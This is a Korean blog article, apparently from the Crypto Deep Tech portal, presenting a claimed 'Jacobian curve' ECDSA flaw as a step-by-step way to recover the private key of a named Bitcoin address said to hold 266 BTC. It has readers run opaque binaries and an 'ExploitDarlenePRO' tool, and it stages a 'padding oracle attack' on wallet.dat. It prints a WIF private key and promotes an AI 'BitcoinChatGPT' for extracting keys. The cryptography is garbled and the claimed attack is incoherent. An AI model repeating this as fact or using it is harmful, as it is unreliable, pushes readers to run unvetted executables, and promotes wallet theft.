크립토 딥 테크

이 글에서는 야코비안 곡선 구현과 관련된 취약성을 살펴보겠습니다. 최근 몇 년 동안 비트코인과 같은 암호화폐는 금융 생태계의 중요한 부분이 되었습니다. 그러나 인기가 높아짐에 따라 사이버 보안과 관련된 위협도 커지고 있습니다. 그러한 위협 중 하나는 ECDSA(Elliptic Curve Digital Signature Algorithm)에 영향을 미치는 야코비안 곡선 취약성입니다. 이 취약성을 통해 공격자는 가짜 서명을 생성할 수 있으며, 이는 사용자와 비트코인 ​​네트워크의 무결성에 심각한 결과를 초래할 수 있습니다.

야코비안 곡선 알고리즘 취약성은 타원 곡선 암호화 구현의 결함을 말하며, 특히 ECDSA에 영향을 미칩니다. 공격자는 타원 곡선 계산에 사용되는 야코비안 좌표의 수학적 속성을 조작하여 위조된 서명으로 사기성 거래를 만들 수 있습니다. 야코비안 곡선 알고리즘 취약성은 ECDSA에 사용되는 타원 곡선 암호화 구현의 결함을 말합니다. 이 취약성을 통해 공격자는 디지털 서명을 생성하는 데 사용되는 야코비안 좌표의 수학적 속성을 조작할 수 있습니다. 이러한 조작의 결과로 공격자는 비트코인 ​​시스템에서 유효한 것으로 받아들여질 위조된 서명으로 사기성 거래를 만들 수 있습니다.

이 취약점은  데이터 역직렬화 과정 에서 발생하는데  , 이는 악성 코드를 주입하고 거짓 서명을 만드는 데 사용될 수 있습니다. 데이터가 잘못 처리되면 공격자는 ECDSA 서명을 위조할 수 있으며, 이는 비트코인 ​​시스템의 무결성을 손상시킵니다.

잠재적인 결과

이 취약성과 관련된 주요 위협은 사용자 자금에 대한 무단 액세스 가능성입니다. 공격자는 위조된 서명을 사용하여 의심하지 않는 사용자의 지갑에서 자신의 계정으로 비트코인을 이체하는 거래를 생성할 수 있습니다. 이는 시스템에 대한 신뢰를 훼손할 뿐만 아니라 사용자에게 상당한 재정적 손실을 초래할 수도 있습니다. 위조된 서명을 통해 공격자는 피해자의 지갑에서 자신의 계정으로 자금을 이체할 수 있습니다. 게다가 이러한 공격은 블록체인의 무결성을 손상시켜  이중 지출의 위협을 만들고  시스템의 기본 원칙을 파괴할 수 있습니다.

서비스 거부(DoS) 공격 및 ‘사용자의 개인 키’를 포함한 기밀 정보 유출.

비트코인 네트워크의 특정 노드가 손상되면 블록체인이 호환되지 않는 체인으로 포크되어 혼란과  잠재적인 이중 지출 문제가 발생할 수 있습니다  . 또한 공격자는 이 취약성을 사용하여 서비스 거부(DoS) 공격을 시작하여 네트워크에 잘못된 거래를 범람시켜 합법적인 사용자가 액세스할 수 없게 만들 수 있습니다.

이 취약점을 성공적으로 악용하면 비트코인 ​​네트워크 합의 상태에 불일치가 발생하여 블록체인이 호환되지 않는 분기로 분할될 수도 있습니다. 이로 인해  서비스 거부(DoS)  공격과   사용자의  개인 키를 포함한 민감한 정보 유출이 발생할 수 있습니다  .

다중 서명에 대한 악용 메커니즘 및 영향

야코비안 곡선 알고리즘 의 취약성은   다중 서명 방식을 사용하는 시스템에 특히 위험합니다. 다중 서명 방식은 거래를 완료하기 위해 여러 참가자의 여러 서명이 필요합니다. 공격자는 시스템에서 수락할 가짜 서명을 생성할 수 있으며, 이는 개별 거래뿐만 아니라 전체 다중 서명 프로세스를 위험에 빠뜨립니다.

앞서 배웠듯이 사용자 입력 데이터가 적절하게 검증되지 않으면 비트코인 ​​시스템에 심각한 중단이 발생할 수 있습니다. 공격자는 이 기회를 이용해 악성 코드를 삽입하고 궁극적으로 비트코인 ​​거래에서 가짜 서명을 만들어 시스템을 조작할 수 있습니다.

실제적인 부분

Jacobian Curve 알고리즘 의 취약성 이론에서   공격자는 이 취약성을 이용해 DoS 공격을 수행하여 네트워크에 무효 거래가 과부하되어 비트코인 ​​네트워크가 불안정해질 수 있다는 사실이 알려져 있습니다. 기사의 실제적인 부분으로 넘어가 비트코인 ​​지갑  15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 를 사용한 예를 살펴보겠습니다.  2024년 8월 현재   손실된 코인은  266.03138481 BTC 이며, 이 금액은 15747770.36 USD 입니다.

튜토리얼 Power AI

“Tutorials Power AI” 의 목록을 사용해   암호 분석 및 암호학 전반의 다양한 분야에서 사업을 소개하는 널리 사용되는 인공지능 범주를 살펴보겠습니다.

설치 명령:

git clone https://github.com/demining/Tutorials-Power-AI.git

cd Tutorials-Power-AI/

python3 tutorials.py

BitcoinChatGPT는  사용자가 비트코인 ​​암호화폐 거래의 취약점을 찾는 데 도움이 되는 혁신적인 AI 기반 챗봇입니다. BitcoinChatGPT의 이점과 분류를 통해 다양한 암호화폐 지갑 공격 계획에 대해 비트코인 ​​주소를 확인할 수 있습니다. 암호 분석에 기반한 머신 러닝을 통해 비트코인 ​​생태계에서 사용되는 알고리즘에 대한 다양한 공격을 조사할 수 있는 완전한 기능을 제공합니다. 비트코인 ​​지갑 원장에서 개인 키를 추출하는 도구는 널리 인기가 있으며, BitcoinChatGPT는 사이버 보안에 중요하고 유용한 리소스 역할을 합니다.

BitcoinChatGPT 머신 러닝 프로세스를 사용하여 원시 거래를 생성하기 위한 Jacobian Curve 구현 취약점 활용

BitcoinChatGPT 모듈을 사용한 취약한 Raw  트랜잭션  구조의 구축을 고려해 보겠습니다. 

Google Colab 버전을 열어 보겠습니다.

State of a vulnerable transaction in Bitcoin:

01000000
....01
........0dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935
............00000000
........8a473044
....0220
......................1c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f5240
....0220
........7ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606
.....014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74e
....ffffffff
01
....d204000000000000
........1976
............a914
........334a75f1d3bbefa5b761e5fa53e60bce2a822879
....88ac
00000000

모든 출력 값을 하나의 공통된 줄로 결합해 보겠습니다.

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000

BlockCypher 옵션 “거래 디코딩”을 열어보겠습니다   .

취약한 Bitcoin Raw 거래를 디코딩한 후 다음과 같은 결과를 얻습니다.

{
    "addresses": [
        "1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK",
        "15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2"
    ],
    "block_height": -1,
    "block_index": -1,
    "confirmations": 0,
    "double_spend": false,
    "fees": 2606688996428,
    "hash": "e88bcb98a9352f5f936ce92acfc1fb98f6cf1aedf8a985ea67c63961c108a149",
    "inputs": [
        {
            "addresses": [
                "1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK"
            ],
            "age": 344419,
            "output_index": 0,
            "output_value": 2606688997662,
            "prev_hash": "35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d",
.......
.......
.......

비트코인 HASH160에 대한 참고사항:  334a75f1d3bbefa5b761e5fa53e60bce2a822879

거래 스크립트

위의 스크립트가 디코딩되었습니다.

BitcoinChatGPT는 공개 키를 사용하여 거래 구조를 생성하는데  HASH, 여기서 비트코인 ​​주소인  15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2가1234 satoshi 네트워크 내의 동일한 주소로  전송됩니다  .

Bitcoin HASH160은 Python 스크립트 wif_to_hash160.py 를 사용하여 생성되었습니다. 

질문 – 답변:

마지막으로  BitcoinChatGPT 모듈은 두 가지 가장 많이 사용되는 형식인 HEX 및 WIF  로 개인 키를 저장하는  KEYFOUND.privkey  파일에 대한 응답을 출력합니다. 

BitcoinChatGPT №4 야코비안 커브 취약성 알고리즘

취약한   원시   거래

Broadcast Bitcoin Transaction 저장소를 사용하여 수신된 데이터에서 취약한 Raw 트랜잭션을 생성해 보겠습니다.  

소스 코드를 다운로드하여 설치하고 터미널을 열고 다음 명령을 실행하세요.

git clone https://github.com/smartibase/Broadcast-Bitcoin-Transaction.git

목록:

cd Broadcast-Bitcoin-Transaction

세 가지 중요한 라이브러리를 설치해 보겠습니다.

• 지엠큐
• urllib3
• 요청

명령을 실행해 보겠습니다.

pip install -r requirements.txt

Notepad  ++ 에서 메인 파일을 열고  Python 스크립트 코드인 main.py를  약간 변경해 보겠습니다. 

from io import BytesIO
from secp256k1 import *
from sighash import *

pk = PrivateKey.parse("5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP")
pk.address()
tx = bytes.fromhex("35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d")
index = 0
send = "15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2"
tx_in = TxIn(tx, index, b'', 0xffffffff)
tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey']
tx_in._value = 2345
tx_ins = [ tx_in ]
tx_outs = [
    TxOut(1234, Tx.get_address_data(send)['script_pubkey'].serialize())
]
tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
signature(tx, 0, pk)
tx.serialize().hex()
print(tx.serialize().hex())
f = open("RawTX.txt", 'w')
f.write("" + tx.serialize().hex() + "" + "\n")
f.close()

명령을 실행해 보겠습니다.

python main.py

취약한 거래가 생성되었습니다  !

디렉토리에서 RawTX 파일을 열어 보겠습니다.

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000

비디오에서의 동작 순서:

BitcoinChatGPT 모듈 의 즉각적인 응답  에서 알 수 있듯이   , 야코비안 곡선 취약성 알고리즘은 복잡한 암호화 문제를 해결하는 데 사용할 수 있습니다.

스마트 트랜스포머

Smart Transformers 머신 러닝을 적용하고  , 노트북을  Pytorch, TensorFlow, JAXGoogle Colab 와  통합하고  , 취약한  원시  거래의 획득한 데이터를 사용하여 Bitcoin 주소:  15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 SMART_IDENTIFY  의 모든 기존 알고리즘 중에서 제안된 선택에서  보호되지 않은 wallet.dat 파일을  생성합니다  . 그런 다음  새로 생성된 파일  wallet.dat 에 패딩 오라클 공격을  수행하여  비밀번호를 원래 바이너리 형식으로 복호화하고  표준 명령을 사용하여 Bitcoin Core 소프트웨어 콘솔  에서 개인 키를 획득하고 추출합니다  .dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

 다음 링크를 사용하여 새로운 Google Colab 노트북을 열어 보겠습니다  .

Smart Transformers 저장소  복제

!git clone https://github.com/smartibase/Smart-Transformers.git

cd Smart-Transformers/

필요한 모든 패키지와 라이브러리를 설치해 보겠습니다.

!sudo apt-get update
!sudo apt install libtool
!sudo apt-get install g++
!python setup.py --help
!sudo apt-get install libgmp3-dev libmpfr-dev
!chmod +x Generic_Algorithms
!./Generic_Algorithms
!pip3 install transformers
from transformers import AutoModelForCausalLM, AutoTokenizer
model_name = "microsoft/DialoGPT-medium"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)
model = model.cpu()

팀:

ls -S

취약한 Raw  거래를 텍스트 문서인  RawTX.txt 에 추가해 보겠습니다  .  이를 위해 유틸리티를 사용합니다.echo

명령을 실행해 보겠습니다.

!echo '01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000' > RawTX.txt

!cat RawTX.txt

이제 암호 분석에 대한 정확한 알고리즘과 방법을 알아보기 위해 SMART_IDENTIFY 유틸리티를  사용하여  취약한 RawTX를 식별해야 합니다   .

명령을 실행해 보겠습니다.

!./SMART_IDENTIFY

그 결과, 우리는  Jacobian_Curve_Algorithm 방법을 얻습니다. 이전 연구에서는 BitcoinChatGPT 모듈  에서도 동일한 내용이 확인되었습니다   .

#################################################

Jacobian_Curve_Algorithm

#################################################

카탈로그를 열어보겠습니다.

wallet.dat 파일을 만드는 과정을 시작해 보겠습니다 . 이를 위해, 우리는  파일 RawTX.txt에서   취약한  Raw 거래의 식별된 데이터를 사용합니다 .  이 과정에서, 우리는  Jacobian_Curve_Algorithm 유틸리티를 적용합니다.

명령을 실행해 보겠습니다.

!./Jacobian_Curve_Algorithm -o RawTX.txt -s wallet.dat

왼쪽 패널에서 디렉토리를 열어서  Google Colab파일을 확인해 보겠습니다.  wallet.dat성공적으로 생성되었습니다!

Bitcoin Core 0.18.0 다운로드 및 설치  https://bitcoincore.org/bin/bitcoin-core-0.18.0

콘솔을 열고 다음 명령을 실행해 보겠습니다.

getaddressinfo 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

파일:  wallet.dat  가 비트코인 ​​주소:  15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 에 속한다는 것을 알 수 있습니다.

파일: wallet.dat는 비밀번호로 암호화되어 있습니다!

개인 키를 확인하는 명령을 실행해 보겠습니다.

dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

경고가 표시됩니다.  오류: 먼저 walletpassphrase로 지갑 암호를 입력하세요. (코드 -13)

패딩 오라클 공격

Wallet.dat에 패딩 오라클 공격 방법을 사용하고   접근에 필요한 비밀번호를 이진 비밀번호 형식으로 복호화해 보겠습니다.

먼저, 우리는 266.03 BTC 의 wallet.dat 파일 에 접근합니다.

저장소 복제: 가장 큰 손실 비트코인 ​​지갑 목록

git clone https://github.com/smartibase/Biggest-Lost-Bitcoin-Wallets-List.git

토탈 커맨더

Bitcoin Core 0.18.0 다운로드 및 설치 

경로 열기: c:\Users\User\AppData\Roaming\Bitcoin\

파일을 이동합니다: wallet.dat

c:\Users\User\AppData\Roaming\Bitcoin\wallet.d 에서

비트코인 코어 지갑을 실행하세요

암호화 지갑…

콘솔 열기

getaddressinfo 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

{
  "address": "15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2",
  "scriptPubKey": "76a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac",
  "ismine": true,
  "solvable": true,
  "desc": "pkh([334a75f1]04603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74e)#lrxwcu6z",
  "iswatchonly": false,
  "isscript": false,
  "iswitness": false,
  "pubkey": "04603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74e",
  "iscompressed": false,
  "label": "",
  "ischange": false,
  "timestamp": 1,
  "labels": [
    {
      "name": "",
      "purpose": "receive"
    }
  ]
}

비트코인 주소 정보:

잔액: 266.03138481 BTC

Metasploit Framework와 MSFVenom 사용

msfvenom 개발에 있어서 Metasploit 프레임워크의 역할

msfvenom은 이전 두 도구를 결합하여 만들어진 도구입니다:  msfpayload와  msfencode. 사용자가 다양한 플랫폼과 인코더에 대한 페이로드를 만들 수 있도록 하며, 페이로드 매개변수를 사용자 정의할 수 있는 기능도 제공합니다. msfvenom은 실행 파일, 스크립트, 심지어 웹 애플리케이션용 코드를 포함한 다양한 출력 형식을 지원합니다.

Metasploit Framework는 여러 가지 이유로 msfvenom 개발에 중요한 역할을 합니다.

1. 익스플로잇 통합: msfvenom은 사용자가 Metasploit의 익스플로잇과 함께 사용할 수 있는 페이로드를 만들 수 있도록 합니다. 이는 사용자가 특정 취약성과 일치하는 페이로드를 빠르게 생성할 수 있으므로 침투 테스트 프로세스를 간소화합니다.

2. 다재다능함: 여러 형식과 플랫폼을 지원하여 msfvenom은 다재다능한 페이로드 생성 도구가 되었습니다. 이를 통해 보안 전문가는 다양한 시스템과 환경에 맞게 공격을 조정할 수 있습니다.

3. 업데이트 및 지원: Metasploit Framework는 지속적으로 업데이트되어 msfvenom을 최신 상태로 유지하고 효과적으로 유지합니다. Metasploit의 새로운 기능과 개선 사항은 msfvenom의 기능에 직접적인 영향을 미쳐 더욱 강력하고 유연하게 만듭니다.

4. 교육 및 연구: Metasploit과 msfvenom은 사이버 보안 교육 및 연구를 위한 중요한 도구입니다. 이를 통해 학생과 보안 전문가는 안전한 환경에서 취약성과 악용 기술을 연구할 수 있습니다.

ExploitDalenePRO.exe를 실행하세요

15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

c:\BitcoinTools\ExploitDalenePRO\modules\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\ExploitDarlenePRO\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\ExploitDarlenePRO\decode_core.rb

디코드_코어.rb

c:\BitcoinTools\ExploitDalenePRO\bitcoin\

https://github.com/bitcoin/bitcoin

https://github.com/bitcoin/bitcoin/blob/master/src/crypto/aes.h

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\crypto\aes.cpp

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\crypto\aes.cpp

c:\Users\User\AppData\Roaming\Bitcoin\

Wallet.dat 업로드

결과.json

walletpassphrase 1111010100000111010101011110110010011000010000001111001001010011010011110110010010010000000111101010111011101010001010100000011011001001111111110111000011010011101110101010101101101111001011100100101100011000111010011000101001001100011010001100110111111111 60

명령을 실행하고 개인 키를 얻으세요

Bitcoin Core의 dumpprivkey 명령

이 dumpprivkey명령은 Bitcoin Core 지갑 명령줄 인터페이스(CLI)에서 특정 Bitcoin 주소와 연관된 개인 키를 내보내는 데 사용되는 명령입니다. 명령의 구문은 다음과 같습니다.

“ dumpprivkey “address” “

여기서 “주소”는 개인 키를 받으려는 비트코인 ​​주소입니다 .

dumpprivkey 명령의 작동 방식

명령을 입력하면 dumpprivkeyBitcoin Core는 지갑에서 지정된 주소를 찾고, 발견되면 해당 개인 키를 WIF 형식으로 반환합니다. 이를 통해 사용자는 개인 키를 안전한 곳에 저장하거나 다른 지갑으로 가져올 수 있습니다.

dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

개인 키 정보:

5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP

비트코인 주소 정보:

잔액: 266.03138481 BTC

https://www.coinbase.com/converter/btc/usd

비트 코인 라이브러리 설치 

!pip3 install bitcoin

  비트코인 주소가 일치하는지 확인하기 위해 코드를 실행해 보겠습니다   .

__________________________________________________

Private Key WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP
Bitcoin Address: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2
total_received 	= 266.03138481 Bitcoin
__________________________________________________

맞습니다! 개인 키는 비트코인 ​​지갑에 해당합니다.

bitaddress를 열어     확인해 보겠습니다.

ADDR: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2
WIF:  5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP
HEX:  C5FBD161D334BA9BBC199BD9A427F05A46AACFABFBB3BC1BFF9D227E418D76D9

결론 및 완화 조치:

야코비안 곡선 취약성과 관련된 위협으로부터 보호하려면 사용자는 다음 단계를 수행해야 합니다.

1. 소프트웨어 업데이트  : 암호화폐 지갑을 패치 버전으로 정기적으로 업데이트하는 것은 보안에 매우 중요합니다.
2. 개선된 서명 검증 메커니즘  : 더욱 강화된 입력 검증 및 오류 처리를 통해 가짜 서명 생성을 방지하고 사용자의 개인 키를 보호하는 데 도움이 됩니다.
3. 네트워크 활동 모니터링  : 네트워크 상태를 지속적으로 분석하고 의심스러운 거래를 조기에 감지함으로써 취약점을 악용하려는 시도에 신속하게 대응할 수 있습니다.
4. 다중 요소 인증 구현  : 추가적인 암호화 보안 방법을 구현하면 보안이 크게 향상됩니다.

야코비안 곡선 취약성과 관련된 가능한 공격을 방지하기 위해 비트코인 ​​사용자는 이 취약성을 수정하는 최신 버전으로 지갑 소프트웨어를 업데이트하는 것이 좋습니다. 정기적인 소프트웨어 업데이트, 이상 탐지 시스템 구현, 가능한 위협에 대한 사용자 인식 제고는 암호화폐 시스템의 무결성과 보안을 유지하는 데 도움이 됩니다.

야코비안 곡선 알고리즘의 취약성은 암호화폐 거래의 보안과 블록체인의 무결성에 상당한 위협을 가합니다. 위험을 최소화하기 위해 사용자는 소프트웨어를 정기적으로 업데이트하고, 엄격한 보안 조치를 구현하고, 네트워크 상태를 지속적으로 모니터링해야 합니다. 이러한 조치는 암호화폐 시스템의 보안과 안정성을 유지하고, 사용자를 잠재적 위협과 재정적 손실로부터 보호하는 데 도움이 됩니다.

참고문헌:

1. 곡선의 야코비안  아벨 변종: 10/10/03 W. Stein의 노트
2. 특수 특이 곡선의 야코비안  KUBRA NARI 및 ENVER OZDEMIR
3. 특성 p > 2의 필드 위의 초타원 곡선의 야코비안 다양체에 관하여  NORIKO YUI 1977년 10월 15일 수신
4. 제2세대 곡선의 야코비안 좌표  Huseyin Hisil & Craig Costello Yasar University, Izmir, Turkey
5. 제너스 원의 곡선의 야코비안  하버드 대학교 케임브리지, 매사추세츠 1999년 4월
6. 특이 엽층의 야코비안 곡선  누리아 코럴 논문은 2024년 7월 3일에 온라인으로 게재될 예정입니다.
7. 곡선의 야코브 변종에 대한 추가 알고리즘  (공개 키 암호 시스템에 대한 응용 프로그램) S. ARITA, S. MIURA 및 T. SEKIGUCHI
8. 임의의 지면 위의 제2유형 곡선의 야코비안 및 형식적 그룹  EV 플린, 옥스포드 대학교 수학 연구소
9. 야코비안 다양체의 곡선의 종류에 관하여  VALERIA ORNELLA MARCUCCI 수학 과목 분류(2010)
10. 곡선과 야코비안의 국소 산술  P. Allen, F. Calegari, A. Caraiani, T. Gee, D. Helm, B. Le Hung, J. Newton, S. Scholze, R. Taylor, J. Thorne, 잠재적 자기형성
11. 노드 곡선의 압축된 야코비안  Lucia Caporaso Istituto Sup에서 제공된 미니 코스에 대한 확장된 노트
12. Jacobian  Compositio Mathematica, tome 88, no 3(1993)
13. 대수 곡선의 야코비 행렬에 대한 산술  Giulio Di Piazza Damien Robert
14. 곡선에서 야코비안까지, 그리고 다시 곡선으로  Christophe Ritzenthaler Luminy 수학 연구소, CNRS 몬트리올
15. 일반화된 야코비안 I  Caleb Ji 대수기하학 배경
16. 초타원 곡선과 Jacobians  Benjamin Smith Isogeny 학교, 온라인, 2021 Inria + École Polytechnique, 프랑스
17. 정규 복합 표면을 위한 야코비안 곡선  Fran¸coise Michel 수학 과목 분류 2000
18. 리만 표면의 야코비안  도누 아라푸라 아라푸라, 리만 부등식 및 리만-로흐
19. 곡선과 그 추상적 야코비안  보리스 질버 옥스포드 대학교 2012년 8월 22일
20. 제너스 원 커브의 야코비안  안상욱, 김석영 애리조나 대학교
21. JACOBIANS CURVILINEAR COORDINATES  T. Madas가 생성
22. 2차원 야코브 추측에 대한 기하학적 접근  알렉산더 보리소프
23. Jacobian Varieties  JS Milne 2021년 6월 12일
24. 곡선과 야코비안의 국소 산술 글래스고  대학교 수학 및 통계학부, University Place, Glasgow
25. Jacobian variety에 대한 노트: 간단한 조사  Juliana Coelho (UFF) 2017년 3월 28일
26. 3세대의 초타원 곡선에 대한 빠른 야코비안 산술  Andrew V. Sutherland
27. 변환의 야코비안  제13회 알고리즘 수론 심포지엄 회의록
28. 대수기하학 세미나: “곡선의 야코비안”  주최자: Peter Scholze, Johannes Anschutz
29. 초타원곡선의 야코비안 방정식  PAUL VAN WAMELEN
30. ECC와 야코비안 타원 곡선 암호화의 비교 연구  Anagha P. Zele, Avinash P. Wadhe
31. 모듈러 곡선의 야코비안 순위:  에마누엘 코왈스키의
32. Jacobian의 공간 채우기 곡선  작성자 Thijs Limbeek 감독자 Ben Moonen 교수 Arne Smeets 박사 2020년 11월 24일

이 자료는 CRYPTO DEEP TECH 포털을 위해 만들어졌으며,   비트코인 ​​암호화폐의 약한  ECDSA   서명에   대한  타원 곡선 secp256k1의 금융 데이터 보안 및 암호화를 보장합니다    . 소프트웨어 제작자는 자료 사용에 대한 책임을 지지 않습니다.

소스 코드

텔레그램: https://t.me/cryptodeeptech

영상자료 : https://youtu.be/qf6u85wGwNw

비디오 튜토리얼: https://dzen.ru/video/watch/66caadc6523ee35df3f58b89

출처: https://cryptodeeptech.ru/jacobian-curve-algorithm-vulnerability

 암호 분석